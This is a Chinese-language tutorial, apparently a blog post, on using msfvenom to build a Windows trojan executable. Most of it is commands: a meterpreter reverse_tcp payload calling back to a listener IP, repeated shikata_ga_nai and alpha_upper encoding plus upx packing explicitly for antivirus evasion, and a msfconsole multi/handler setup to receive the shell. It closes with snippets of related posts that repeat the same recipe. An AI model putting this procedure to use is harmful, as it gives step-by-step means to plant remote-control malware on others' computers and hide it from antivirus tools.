一,目的:熟悉msfvenom生成木馬程式過程,並執行和監聽控制.
二,工具:msf
三,原理:msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線
四,過程:
1,檢視幫助
命令: root# msfvenom -h
結果:
2,生成meterpreter payload 並利用shikata_ga_nai編碼,檢視所需選項,利用 -o引數
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
結果:
3,現在設定lhost,即監聽主機ip和lport監聽埠,我是本地區域網測試,所以ip是192.168.1.113,埠設定成443.所以最後連線會通向192.168.1.113的443埠
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 『\x00』 lhost=192.168.1.113 lport=443 -f exe > abc.exe
注:如果只是用msfpayload生成,簡單示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.113 x > desktop/abc.exe
多次生成可進行免殺:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/desktop/acn.exe
upx加殼:upx -5 /root/desktop/acn.exe
結果:說明: -p payload
-e 編碼方式
-i 編碼次數
-b 在生成的程式中避免出現的值
lhost,lport 監聽上線的主機ip和埠
-f exe 生成exe格式
4,把生成的abc.exe放到win7下.執行.
5,在命令列下,開啟msfconsole.
命令: root # msfconsole
6,本機監聽,因為之前用的是reverse_tcp,所以設定如下
命令: msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
結果:
7,現在快完成了,設定lhost,lport,並執行exploit,會發現有連線進來.
8,.驗證
msfvenom木馬生成
kali winxp 生成木馬檔案 msfvenom p windows meterpreter reverse tcp lhost ip lport 4444 f exe a.exe 開啟msfconsole,等待檔案執行彈回shell use exploit multi hander set p...
利用msfvenom生成木馬程式
一,目的 熟悉msfvenom生成木馬程式過程,並執行和監聽控制.二,工具 msf 三,原理 msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線 四,過程 1,檢視幫助 命令 root...
利用msfvenom生成木馬檔案
當我們需要往目標機上傳木馬檔案時,我們就可以利用msfvenom生成乙個木馬檔案,並用metersploit進行監聽,就能夠 回shell。我們製作的木馬檔案有沒有免殺功能,可以在virscan中進行掃瞄檢測一下。或者在本地用一些防毒軟體進行檢測。1.生成windows木馬程式。生成乙個window...